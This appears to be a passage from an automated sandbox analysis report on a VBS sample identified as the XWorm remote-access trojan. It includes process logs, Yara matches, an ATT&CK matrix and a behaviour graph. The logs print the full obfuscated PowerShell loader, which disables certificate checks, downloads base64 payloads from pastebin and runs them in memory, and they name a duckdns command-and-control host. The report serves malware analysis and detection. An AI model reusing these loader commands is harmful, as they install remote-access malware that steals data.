'j?bh?g0?cwbo?gu?i??9?c??jw?w?dm?jw?7?cq?dgb2?gu?cgby?c??pq?g?cc?jqbw?ho?qqbj?e8?zwbj?g4?tqby?cu?jw?7?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqby?hy?aqbj?gu?u?bv?gk?bgb0?e0?yqbu?ge?zwbl?hi?xq?6?do?uwbl?hi?dgbl?hi?qwbl?hi?d?bp?gy?aqbj?ge?d?bl?fy?yqbs?gk?z?bh?hq?aqbv?g4?qwbh?gw?b?bi?ge?ywbr?c??pq?g?hs?j?b0?hi?dqbl?h0?owbb?fm?eqbz?hq?zqbt?c4?tgbl?hq?lgbt?gu?cgb2?gk?ywbl?f??bwbp?g4?d?bn?ge?bgbh?gc?zqby?f0?og?6?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?i??9?c??wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?gm?dqby?gk?d?b5?f??cgbv?hq?bwbj?g8?b?bu?hk?c?bl?f0?og?6?fq?b?bz?de?mg?7?fs?qgb5?hq?zqbb?f0?xq?g?cq?a?b6?gy?ygbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?tgbl?hc?lqbp?gi?agbl?gm?d??g?e4?zqb0?c4?vwbl?gi?qwbs?gk?zqbu?hq?kq?u?eq?bwb3?g4?b?bv?ge?z?bt?hq?cgbp?g4?zw?o?c??k?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??tgbl?hq?lgbx?gu?ygbd?gw?aqbl?g4?d??p?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?jwbo?hq?d?bw?do?lw?v?h??yqbz?hq?zqbi?gk?bg?u?gm?bwbt?c8?cgbh?hc?lwbw?dk?eq?1?fe?nqb2?hy?jw?p?c??kq?g?ck?owbb?hm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?gg?egbm?gi?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?cc?yg?3?fm?sgbi?dc?r?bj?c8?dwbh?hi?lwbt?g8?yw?u?g4?aqbi?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?hy?dgbl?hi?cg?g?cw?i??n?f8?xwbf?hc?aqbu?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?ge?bqbz?gg?zq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $lopuennntes.replace('?','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'c:\users\user\desktop\sostener.vbs';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;[byte[]] $hzfbs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring( (new-object net.webclient).downloadstring('http://pastebin.com/raw/v9y5q5vv') ) );[system.appdomain]::currentdomain.load($hzfbs).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('b7sjb7dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'roda' ));"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $lopuennntes = 'j?bh?g0?cwbo?gu?i??9?c??jw?w?dm?jw?7?cq?dgb2?gu?cgby?c??pq?g?cc?jqbw?ho?qqbj?e8?zwbj?g4?tqby?cu?jw?7?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqby?hy?aqbj?gu?u?bv?gk?bgb0?e0?yqbu?ge?zwbl?hi?xq?6?do?uwbl?hi?dgbl?hi?qwbl?hi?d?bp?gy?aqbj?ge?d?bl?fy?yqbs?gk?z?bh?hq?aqbv?g4?qwbh?gw?b?bi?ge?ywbr?c??pq?g?hs?j?b0?hi?dqbl?h0?owbb?fm?eqbz?hq?zqbt?c4?tgbl?hq?lgbt?gu?cgb2?gk?ywbl?f??bwbp?g4?d?bn?ge?bgbh?gc?zqby?f0?og?6?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?i??9?c??wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?gm?dqby?gk?d?b5?f??cgbv?hq?bwbj?g8?b?bu?hk?c?bl?f0?og?6?fq?b?bz?de?mg?7?fs?qgb5?hq?zqbb?f0?xq?g?cq?a?b6?gy?ygbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?tgbl?hc?lqbp?gi?agbl?gm?d??g?e4?zqb0?c4?vwbl?gi?qwbs?gk?zqbu?hq?kq?u?eq?bwb3?g4?b?bv?ge?z?bt?hq?cgbp?g4?zw?o?c??k?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??tgbl?hq?lgbx?gu?ygbd?gw?aqbl?g4?d??p?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?jwbo?hq?d?bw?do?lw?v?h??yqbz?hq?zqbi?gk?bg?u?gm?bwbt?c8?cgbh?hc?lwbw?dk?eq?1?fe?nqb2?hy?jw?p?c??kq?g?ck?owbb?hm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?gg?egbm?gi?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?cc?yg?3?fm?sgbi?dc?r?bj?c8?dwbh?hi?lwbt?g8?yw?u?g4?aqbi?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?hy?dgbl?hi?cg?g?cw?i??n?f8?xwbf?hc?aqbu?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?ge?bqbz?gg?zq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $lopuennntes.replace('?','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'c:\users\user\appdata\local\temp\sostener.vbs';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;[byte[]] $hzfbs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring( (new-object net.webclient).downloadstring('http://pastebin.com/raw/v9y5q5vv') ) );[system.appdomain]::currentdomain.load($hzfbs).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('b7sjb7dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: RegAsm.exe, 00000007.00000002.3345509657.000000000166B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7308, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7308, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts11
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		OS Credential Dumping2
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		1
                DLL Side-Loading                		211
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		2
                Registry Run Keys / Startup Folder                		2
                Registry Run Keys / Startup Folder                		31
                Obfuscated Files or Information                		Security Account Manager121
                Security Software Discovery                		SMB/Windows Admin SharesData from Network Shared Drive11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Command and Scripting Interpreter                		Login HookLogin Hook3
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets131
                Virtualization/Sandbox Evasion                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input Capture23
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524706 Sample: sostener.vbs Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 54 toskaadmx.duckdns.org 2->54 56 pastebin.com 2->56 58 5 other IPs or domains 2->58 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 86 22 other signatures 2->86 10 wscript.exe 1 2->10         started        13 powershell.exe 11 2->13         started        signatures3 82 Uses dynamic DNS services 54->82 84 Connects to a pastebin service (likely for C&C) 56->84 process4 signatures5 94 Suspicious powershell command line found 10->94 96 Wscript starts Powershell (via cmd or directly) 10->96 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->98 100 Suspicious execution chain found 10->100 15 powershell.exe 7 10->15         started        102 Wscript called in batch mode (surpress errors) 13->102 18 wscript.exe 1 13->18         started        20 conhost.exe 1 13->20         started        process6 signatures7 104 Suspicious powershell command line found 15->104 106 Suspicious execution chain found 15->106 108 Found suspicious powershell code related to unpacking or dynamic code loading 15->108 110 Wscript called in batch mode (surpress errors) 15->110 22 powershell.exe 14 17 15->22         started        27 conhost.exe 15->27         started        112 Wscript starts Powershell (via cmd or directly) 18->112 29 powershell.exe 7 18->29         started        process8 